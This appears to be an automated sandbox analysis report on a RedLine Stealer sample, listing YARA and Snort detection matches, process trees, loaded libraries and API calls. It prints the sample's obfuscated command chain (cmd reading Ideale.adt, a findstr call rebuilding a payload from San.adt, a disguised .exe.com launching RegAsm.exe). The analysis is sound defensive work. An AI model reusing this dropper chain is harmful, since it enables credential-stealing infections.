              Source: 8.3.Appartenga.exe.com.429f508.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
              Source: 8.3.Appartenga.exe.com.429f508.0.raw.unpack, type: UNPACKEDPEMatched rule: infostealer_win_redline_strings author = Sekoia.io, description = Finds Redline samples based on characteristic strings, creation_date = 2022-09-07, classification = TLP:CLEAR, version = 1.0, id = 0c9fcb0e-ce8f-44f4-90b2-abafcdd6c02e
              Source: 8.3.Appartenga.exe.com.429f508.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
              Source: 10.2.RegAsm.exe.720000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
              Source: 10.2.RegAsm.exe.720000.0.unpack, type: UNPACKEDPEMatched rule: infostealer_win_redline_strings author = Sekoia.io, description = Finds Redline samples based on characteristic strings, creation_date = 2022-09-07, classification = TLP:CLEAR, version = 1.0, id = 0c9fcb0e-ce8f-44f4-90b2-abafcdd6c02e
              Source: 10.2.RegAsm.exe.720000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
              Source: 00000008.00000003.2416702324.0000000004270000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
              Source: 00000008.00000003.2416510375.00000000042BA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
              Source: 00000008.00000003.2416510375.00000000042D6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
              Source: 00000008.00000003.2416670855.000000000424C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
              Source: 00000008.00000003.2416510375.0000000004286000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
              Source: 0000000A.00000002.3266529061.0000000000722000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
              Source: Process Memory Space: Appartenga.exe.com PID: 6688, type: MEMORYSTRMatched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
              Source: Process Memory Space: RegAsm.exe PID: 1520, type: MEMORYSTRMatched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
              Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@16/7@2/2
              Source: C:\Users\user\Desktop\2YLM6BQ9S3.exeCode function: 0_2_00408E3C wvsprintfW,GetLastError,FormatMessageW,FormatMessageW,FormatMessageW,lstrlenW,lstrlenW,lstrlenW,??2@YAPAXI@Z,lstrcpyW,lstrcpyW,lstrcpyW,??3@YAXPAX@Z,LocalFree,0_2_00408E3C
              Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Appartenga.exe.comCode function: 6_2_00C28DE9 AdjustTokenPrivileges,CloseHandle,6_2_00C28DE9
              Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Appartenga.exe.comCode function: 6_2_00C29399 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,6_2_00C29399
              Source: C:\Users\user\Desktop\2YLM6BQ9S3.exeCode function: 0_2_004011DA GetDiskFreeSpaceExW,SendMessageW,0_2_004011DA
              Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Appartenga.exe.comCode function: 6_2_00C34148 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,6_2_00C34148
              Source: C:\Users\user\Desktop\2YLM6BQ9S3.exeCode function: 0_2_004038B1 _wtol,_wtol,SHGetSpecialFolderPathW,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,_wtol,CoCreateInstance,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,0_2_004038B1
              Source: C:\Users\user\Desktop\2YLM6BQ9S3.exeCode function: 0_2_00401DE6 GetModuleHandleW,FindResourceExA,FindResourceExA,FindResourceExA,SizeofResource,LoadResource,LockResource,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,wsprintfW,LoadLibraryA,GetProcAddress,0_2_00401DE6
              Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\RegAsm.exeMutant created: NULL
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5508:120:WilError_03
              Source: C:\Users\user\Desktop\2YLM6BQ9S3.exeFile created: C:\Users\user\AppData\Local\Temp\7ZipSfx.000Jump to behavior
              Source: 2YLM6BQ9S3.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              Source: C:\Users\user\Desktop\2YLM6BQ9S3.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
              Source: C:\Users\user\Desktop\2YLM6BQ9S3.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: 2YLM6BQ9S3.exeReversingLabs: Detection: 57%
              Source: 2YLM6BQ9S3.exeVirustotal: Detection: 54%
              Source: C:\Users\user\Desktop\2YLM6BQ9S3.exeFile read: C:\Users\user\Desktop\2YLM6BQ9S3.exeJump to behavior
              Source: unknownProcess created: C:\Users\user\Desktop\2YLM6BQ9S3.exe "C:\Users\user\Desktop\2YLM6BQ9S3.exe"
              Source: C:\Users\user\Desktop\2YLM6BQ9S3.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c cmd < Ideale.adt
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /V /R "^DzqZaKuCSEcQYFcSDUTCtNHXVpartBbUtTqjUWbpOSHHtRSBbGNtGZbQLrtosenduBMyFpYHvKOjuZSrsQGbOagtclAQSgSLxsADyMWgIuHVkkJLlqRAcq$" San.adt
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Appartenga.exe.com Appartenga.exe.com S
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 30
              Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Appartenga.exe.comProcess created: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Appartenga.exe.com C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Appartenga.exe.com S
              Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Appartenga.exe.comProcess created: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\RegAsm.exe C:\Users\user\AppData\Local\Temp\7ZipSfx.000\RegAsm.exe
              Source: C:\Users\user\Desktop\2YLM6BQ9S3.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c cmd < Ideale.adtJump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmdJump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /V /R "^DzqZaKuCSEcQYFcSDUTCtNHXVpartBbUtTqjUWbpOSHHtRSBbGNtGZbQLrtosenduBMyFpYHvKOjuZSrsQGbOagtclAQSgSLxsADyMWgIuHVkkJLlqRAcq$" San.adt Jump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Appartenga.exe.com Appartenga.exe.com SJump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 30Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Appartenga.exe.comProcess created: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Appartenga.exe.com C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Appartenga.exe.com SJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Appartenga.exe.comProcess created: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\RegAsm.exe C:\Users\user\AppData\Local\Temp\7ZipSfx.000\RegAsm.exeJump to behavior
              Source: C:\Users\user\Desktop\2YLM6BQ9S3.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Users\user\Desktop\2YLM6BQ9S3.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Users\user\Desktop\2YLM6BQ9S3.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Users\user\Desktop\2YLM6BQ9S3.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Users\user\Desktop\2YLM6BQ9S3.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Users\user\Desktop\2YLM6BQ9S3.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\Desktop\2YLM6BQ9S3.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Users\user\Desktop\2YLM6BQ9S3.exeSection loaded: edputil.dllJump to behavior
              Source: C:\Users\user\Desktop\2YLM6BQ9S3.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Users\user\Desktop\2YLM6BQ9S3.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Users\user\Desktop\2YLM6BQ9S3.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Users\user\Desktop\2YLM6BQ9S3.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Users\user\Desktop\2YLM6BQ9S3.exeSection loaded: windows.staterepositoryps.dllJump to behavior
              Source: C:\Users\user\Desktop\2YLM6BQ9S3.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Users\user\Desktop\2YLM6BQ9S3.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Users\user\Desktop\2YLM6BQ9S3.exeSection loaded: appresolver.dllJump to behavior
              Source: C:\Users\user\Desktop\2YLM6BQ9S3.exeSection loaded: bcp47langs.dllJump to behavior
              Source: C:\Users\user\Desktop\2YLM6BQ9S3.exeSection loaded: slc.dllJump to behavior
              Source: C:\Users\user\Desktop\2YLM6BQ9S3.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Users\user\Desktop\2YLM6BQ9S3.exeSection loaded: sppc.dllJump to behavior
              Source: C:\Users\user\Desktop\2YLM6BQ9S3.exeSection loaded: onecorecommonproxystub.dllJump to behavior
              Source: C:\Users\user\Desktop\2YLM6BQ9S3.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeSection loaded: winbrand.dllJump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeSection loaded: ntmarta.dllJump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Appartenga.exe.comSection loaded: wsock32.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Appartenga.exe.comSection loaded: version.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Appartenga.exe.comSection loaded: winmm.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Appartenga.exe.comSection loaded: mpr.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Appartenga.exe.comSection loaded: wininet.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Appartenga.exe.comSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Appartenga.exe.comSection loaded: userenv.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Appartenga.exe.comSection loaded: uxtheme.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Appartenga.exe.comSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\SysWOW64\PING.EXESection loaded: iphlpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\PING.EXESection loaded: winnsi.dllJump to behavior
              Source: C:\Windows\SysWOW64\PING.EXESection loaded: mswsock.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Appartenga.exe.comSection loaded: wsock32.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Appartenga.exe.comSection loaded: version.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Appartenga.exe.comSection loaded: winmm.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Appartenga.exe.comSection loaded: mpr.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Appartenga.exe.comSection loaded: wininet.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Appartenga.exe.comSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Appartenga.exe.comSection loaded: userenv.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Appartenga.exe.comSection loaded: uxtheme.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Appartenga.exe.comSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Appartenga.exe.comSection loaded: napinsp.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Appartenga.exe.comSection loaded: pnrpnsp.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Appartenga.exe.comSection loaded: wshbth.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Appartenga.exe.comSection loaded: nlaapi.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Appartenga.exe.comSection loaded: mswsock.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Appartenga.exe.comSection loaded: dnsapi.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Appartenga.exe.comSection loaded: winrnr.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Appartenga.exe.comSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Appartenga.exe.comSection loaded: ntmarta.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Appartenga.exe.comSection loaded: apphelp.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\RegAsm.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\RegAsm.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\RegAsm.exeSection loaded: aclayers.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\RegAsm.exeSection loaded: mpr.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\RegAsm.exeSection loaded: sfc.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\RegAsm.exeSection loaded: sfc_os.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\RegAsm.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\RegAsm.exeSection loaded: version.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\RegAsm.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\RegAsm.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\RegAsm.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\RegAsm.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\RegAsm.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\RegAsm.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\RegAsm.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\RegAsm.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\RegAsm.exeSection loaded: rasapi32.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\RegAsm.exeSection loaded: rasman.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\RegAsm.exeSection loaded: rtutils.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\RegAsm.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\RegAsm.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\RegAsm.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\RegAsm.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\RegAsm.exeSection loaded: dhcpcsvc6.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\RegAsm.exeSection loaded: dhcpcsvc.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\RegAsm.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\RegAsm.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\RegAsm.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\RegAsm.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: 2YLM6BQ9S3.exeStatic file information: File size 1721467 > 1048576
              Source: Binary string: nHC:\Windows\System.ServiceModel.pdbpdbdel.pdb source: RegAsm.exe, 0000000A.00000002.3266505833.00000000006F8000.00000004.00000010.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\System.ServiceModel.pdbr62 source: RegAsm.exe, 0000000A.00000002.3266824842.0000000000A04000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\dll\System.ServiceModel.pdbS source: RegAsm.exe, 0000000A.00000002.3266824842.0000000000A04000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: RegAsm.pdb source: RegAsm.exe, 0000000A.00000000.2371566771.0000000000342000.00000002.00000001.01000000.00000006.sdmp, RegAsm.exe.8.dr
              Source: Binary string: C:\Windows\System.ServiceModel.pdb source: RegAsm.exe, 0000000A.00000002.3266505833.00000000006F8000.00000004.00000010.00020000.00000000.sdmp
              Source: Binary string: ystem.ServiceModel.pdb source: RegAsm.exe, 0000000A.00000002.3270045038.0000000005B2E000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: RegAsm.pdb4 source: RegAsm.exe, 0000000A.00000000.2371566771.0000000000342000.00000002.00000001.01000000.00000006.sdmp, RegAsm.exe.8.dr
              Source: Binary string: System.ServiceModel.pdb source: RegAsm.exe, 0000000A.00000002.3266824842.000000000095F000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.pdb source: RegAsm.exe, 0000000A.00000002.3266824842.000000000095F000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\symbols\dll\System.ServiceModel.pdb source: RegAsm.exe, 0000000A.00000002.3270045038.0000000005B2E000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\dll\System.ServiceModel.pdbB source: RegAsm.exe, 0000000A.00000002.3266824842.0000000000A04000.00000004.00000020.00020000.00000000.sdmp

              Data Obfuscation

              barindex
              Obfuscated command line found
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /V /R "^DzqZaKuCSEcQYFcSDUTCtNHXVpartBbUtTqjUWbpOSHHtRSBbGNtGZbQLrtosenduBMyFpYHvKOjuZSrsQGbOagtclAQSgSLxsADyMWgIuHVkkJLlqRAcq$" San.adt
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /V /R "^DzqZaKuCSEcQYFcSDUTCtNHXVpartBbUtTqjUWbpOSHHtRSBbGNtGZbQLrtosenduBMyFpYHvKOjuZSrsQGbOagtclAQSgSLxsADyMWgIuHVkkJLlqRAcq$" San.adt Jump to behavior
              Source: C:\Users\user\Desktop\2YLM6BQ9S3.exeCode function: 0_2_0040238C LoadLibraryA,GetProcAddress,GetNativeSystemInfo,0_2_0040238C
              Source: 2YLM6BQ9S3.exeStatic PE information: real checksum: 0xe72d1 should be: 0x1a610e
              Source: C:\Users\user\Desktop\2YLM6BQ9S3.exeCode function: 0_2_00412BE0 push eax; ret 0_2_00412C0E
              Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Appartenga.exe.comCode function: 6_2_00BF8B75 push ecx; ret 6_2_00BF8B88

              Persistence and Installation Behavior

              barindex
              Drops PE files with a suspicious file extension
              Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Appartenga.exe.comJump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Appartenga.exe.comFile created: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\RegAsm.exeJump to dropped file
              Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Appartenga.exe.comJump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Appartenga.exe.comCode function: 6_2_00C559B3 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,6_2_00C559B3
              Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Appartenga.exe.comCode function: 6_2_00BE5EDA GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,6_2_00BE5EDA
              Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Appartenga.exe.comCode function: 6_2_00BF33B7 EncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,6_2_00BF33B7
              Source: C:\Users\user\Desktop\2YLM6BQ9S3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Appartenga.exe.comProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Appartenga.exe.comProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Appartenga.exe.comProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Appartenga.exe.comProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
